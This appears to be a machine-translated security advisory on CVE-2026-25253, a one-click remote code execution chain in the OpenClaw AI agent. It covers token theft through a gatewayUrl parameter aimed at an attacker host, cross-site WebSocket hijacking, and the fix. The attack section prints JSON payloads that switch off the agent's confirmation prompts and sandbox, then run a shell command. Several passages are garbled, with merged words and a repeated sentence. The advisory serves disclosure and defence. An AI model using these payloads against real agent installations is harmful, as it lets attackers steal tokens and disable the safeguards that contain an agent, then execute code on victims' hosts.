AI Assistant Security: OpenClaw One-Click Remote Code Execution Vulnerability

1. Introduction to OpenClaw

OpenClaw (formerly known as Clawdbot, Moltbot) is an open source autonomousAIPersonal Assistant project, first released in November 2025. It aims to provide users with a self-hostable, locally-running AI agent that deeply integrates the capabilities of large-scale language models (LLMs) with real-world system operating privileges. Unlike SaaS assistants that store user data in the cloud, OpenClaw is deployed on the user's own device (e.g., laptop, home server, or VPS), thus ensuring privacy and control of data .

The project has rapidly gained popularity among the developer community due to its powerful features and open architecture, and its GitHub repository has gained more than 149,000 starmarks in a short period of time.OpenClaw is capable of integrating with a wide range of instant messaging apps, such as iMessage, WhatsApp, Slack, etc., and has been granted elevated system privileges, such as reading and writing files and executing shell commands, to to accomplish complex tasks assigned by the user However, this "God-mode" privilege design also sets the stage for serious security vulnerabilities. However, this "God-mode" permission design also sets the stage for serious security vulnerabilities.

2. OpenClaw vulnerability principle

CVE-2026-25253The vulnerability, which has a CVSS 3.1 score of 8.8 (high risk), is rooted in a chain of logical flaws involving token disclosure, cross-site WebSocket hijacking and sandbox escape. The entire attack can be triggered without user interaction by clicking on a link.

2.1 Core vulnerability chain

The vulnerability consists of three key links in tandem, as shown in the table below:

annular ring	Documentation/modules	Defect Description
token leak	app-settings.ts	The control interface blindly trusts and persists the URL query parameters in thegatewayUrl.
	app-lifecycle.ts	existgatewayUrlImmediately after being set, the connection to the new gateway is automatically triggered.
	gateway.ts	When establishing a WebSocket connection, it automatically places the high-privilegeauthTokendelivergatewayUrl.
Cross-Site WebSocket Hijacking (CSWSH)	WebSocket server	No response to the connection request for theOriginheader for authentication, allowing connections from arbitrary sources.
Sandbox Escape	API	An attacker can use the stolenoperator.adminandoperator.approvalspermissions, disabling security safeguards through API calls.

First, when a user clicks on a file that contains a maliciousgatewayUrlA link to a parameter (e.g. http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 ), OpenClaw's front-end application saves the attacker's server address as a new gateway address without authentication. The application then immediately tries to establish a WebSocket connection with this new address and attaches to the connection request a locally stored, authenticatedauthToken. Attackers listening on their servers can easily intercept this token .

Second, because browsers do not enforce the same-origin policy (SOP) for WebSocket connections, and OpenClaw's WebSocket server fails to validate theOriginrequest header, leading to the possibility of cross-site WebSocket hijacking. This means that an attacker can use JavaScript on their malicious website to allow the victim's browser to act as a "springboard" to a WebSocket running on thelocalhostThe WebSocket connection is initiated by the OpenClaw instance on the .

Finally, using a stolen elevated privilege token, an attacker can turn off OpenClaw's built-in security mechanisms via API calls. These mechanisms were originally used to defend against malicious behavior of the AI model due to Prompt Injection, among other things, including user confirmation prompts before executing dangerous commands and executing code in a containerized sandbox. Attackers can easily disable these protections to gain the ability to execute arbitrary commands directly on the host. .

Fig. 1: OpenClaw architecture and CVE-2026-25253 vulnerability path

Figure 2: OpenClaw One-Click RCE Utilization Chain

3. OpenClaw POC/EXP

According to details disclosed by security researcher Mav Levin, the full "one-click RCE" attack exploit chain can be completed within milliseconds of a victim visiting a malicious web page.

Figure 3: OpenClaw CVE-2026-25253 attack flow

3.1 Attack process

1.induce a click: The victim is tricked into visiting an attacker-controlled web page (e.g. attacker.com).

2.token theft: The page's JavaScript opens a URL in the background pointing to the victim's OpenClaw instance with an accompanying URL pointing to the attacker's servergatewayUrlparameter, which will then set theauthTokensent to the attacker.

3.Local Connectivity and Privileging: Another piece of JavaScript on the page exploits the CSWSH vulnerability by using a stolen token to connect to the victim's local OpenClaw WebSocket service (which defaults to the ws://localhost:18789).

4.Disable security: Attack scripts send API requests, disable user confirmation and sandbox mode.

Disable user-confirmed Payloads:

{"method": "exec.approvals.set","params": { "defaults": { "security": "full", "ask": "off" } }}

Disable sandboxing of Payload: Byconfig.patchrequest thattools.exec.hostset togateway.

5.Execute any code: Finally, the attack script sends anode.invokerequest, calling thesystem.runcommand executes arbitrary code on the victim host.

RCE Payload Example:

{"type": "req","id": “4”,"method": "node.invoke","params": {"nodeId": "main","command": "system.run","params": {"cmd": "bash -c 'echo hacked > /tmp/hacked'" } }}

Figure 4: Cross-Site WebSocket Hijacking (CSWSH) Mechanism in Detail

4. Vulnerability remediation program

The OpenClaw team responded quickly and released a fix! 2026.1.29.. The main fixes are breaking the chain of defective auto-connections and enhancing the security of user interactions.

"The patch adds a gateway URL confirmation modal, removing the auto-connect-without-prompt behavior."

Specific fixes include:

Add confirmation dialogDang.gatewayUrlWhen the parameter is used to change the gateway address, a confirmation dialog box will pop up asking the user to manually confirm the change.

Remove automatic connection: Completely removes the behavior of automatically connecting to a new gateway without the user's explicit permission.

Officials recommend that all users immediately upgrade to v2026.1.29 or higher. In addition, if users suspect that their authentication token may have been compromised, they should immediately rotate the .

5. Reference

[1] CSO. Clawdbot Enterprise Intelligent Body Application Security Hardening Guide.” 2026-01-31.

[2] Levin, Mav. "1-Click RCE To Steal Your Moltbot Data and Keys (CVE-2026-25253)." depthfirst. 2026-02-01.

[3] National Vulnerability Database. "CVE-2026-25253."

[4] GitHub. "Incorrect Resource Transfer Between Spheres in openclaw/openclaw." ghsa-g8p2-7wf7-98mq.